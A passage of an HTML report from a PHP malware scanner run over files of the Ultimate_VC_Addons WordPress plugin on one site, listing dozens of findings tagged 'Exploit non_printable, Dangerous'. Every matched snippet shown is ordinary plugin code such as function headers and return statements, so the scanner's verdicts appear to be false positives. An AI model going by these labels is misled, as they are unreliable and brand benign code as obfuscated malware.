</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">BSF_UPDATER_FILE </span><span style="color: #007700">), </span><span style="color: #DD0000">'/' </span><span style="color: #007700">) . </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_brainstorm_product' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Product</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_brainstorm_product</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstorm_get_all_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_api_site</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">All Products</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_get_all_products</span><span style="color: #007700">( </span><span style="color: #0000BB">$skip_plugins </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$skip_themes </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$skip_bundled </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_api_site</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefer_unsecure </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extension_nag' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extension_nag</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mu_updater </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_nag_brainstorm_updater_multisite' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_api_site</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_nag_brainstorm_updater_multisite</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_plugin_active_for_network' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_loaded_bsf_core_name</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_api_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefer_unsecure </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions </span><span style="color: #007700">for </span><span style="color: #0000BB">BSF Core</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_time_since_last_versioncheck</span><span style="color: #007700">( </span><span style="color: #0000BB">$hours_completed</span><span style="color: #007700">, </span><span style="color: #0000BB">$option </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_convert_core_path_to_relative' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">String URL of bsf</span><span style="color: #007700">-</span><span style="color: #0000BB">core directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_convert_core_path_to_relative</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">__FUNCTION__</span><span style="color: #007700">, </span><span style="color: #DD0000">'1.22.46'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_core_url' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bsf_core_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">String URL of bsf</span><span style="color: #007700">-</span><span style="color: #0000BB">core directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$append </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_490").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/plugin-installer/admin-functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_491" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_render_bundled_products</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$installed </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'check_bsf_product_status' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_bsf_product_status</span><span style="color: #007700">( </span><span style="color: #0000BB">$id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions </span><span style="color: #007700">for </span><span style="color: #0000BB">bsf core</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bundled_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bundled_plugins</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_491").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/classes/class-bsf-core-update.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_492" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; } </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf-updater-version'</span><span style="color: #007700">, </span><span style="color: #0000BB">BSF_UPDATER_VERSION </span><span style="color: #007700">); </span><span style="color: #0000BB">do_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'astra_update_after' </span><span style="color: #007700">); } } } </span><span style="color: #0000BB">BSF_Core_Update</span><span style="color: #007700">::</span><span style="color: #0000BB">get_instance</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_492").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/classes/class-bsf-extension-installer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.01 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_493" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
